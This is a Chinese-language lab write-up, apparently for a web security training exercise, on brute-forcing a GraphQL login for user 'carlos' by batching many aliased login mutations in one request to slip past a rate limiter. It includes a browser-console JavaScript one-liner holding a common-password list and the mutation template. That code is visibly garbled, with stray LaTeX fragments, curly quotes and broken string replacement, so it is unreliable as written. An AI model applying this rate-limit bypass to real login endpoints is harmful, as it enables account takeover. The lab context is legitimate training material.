題目要求：

本實驗的用戶登錄機制由 GraphQL API 提供支持。API 終端節點有一個速率限制器，如果它在短時間內收到來自同一源的太多請求，則會返回錯誤。
要解決實驗問題，請暴力破解登錄機制以 .使用身份驗證實驗室密碼列表作為密碼源。carlos

訪問網站抓包發現graphQL接口

使用burp自帶得GraphQL功能 設置內省查詢，獲得這個接口下相關變量得詳細信息

然后再發送到InQL插件進行分析發現

按照題目要求要進行登陸爆破，所以將login這里發到reapeter。

然后進行登錄爆破，這里我們構造post的數據，利用大模型來構造

直接這張圖片提供給大模型，并要求他幫我們填寫variables

多次操作發現登錄速率限制

但是
嘗試修改，突破API請求限制，發現可以一次請求多次登錄
通過將以下內容復制到chorme瀏覽器控制臺運行生成大量請求的快捷方式來實現一次訪問多次登錄請求

copy(123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow.split(‘,’).map((element,index)=>bruteforce$index:login(input:{password: "$password", username: "carlos"}) { token success }.replaceAll(‘$inde{x}^{\prime },index).replaceAll{(}^{\prime }$password’,element)).join(‘\n’));console.log(“The query has been copied to your clipboard.”);

得到正確密碼登錄成功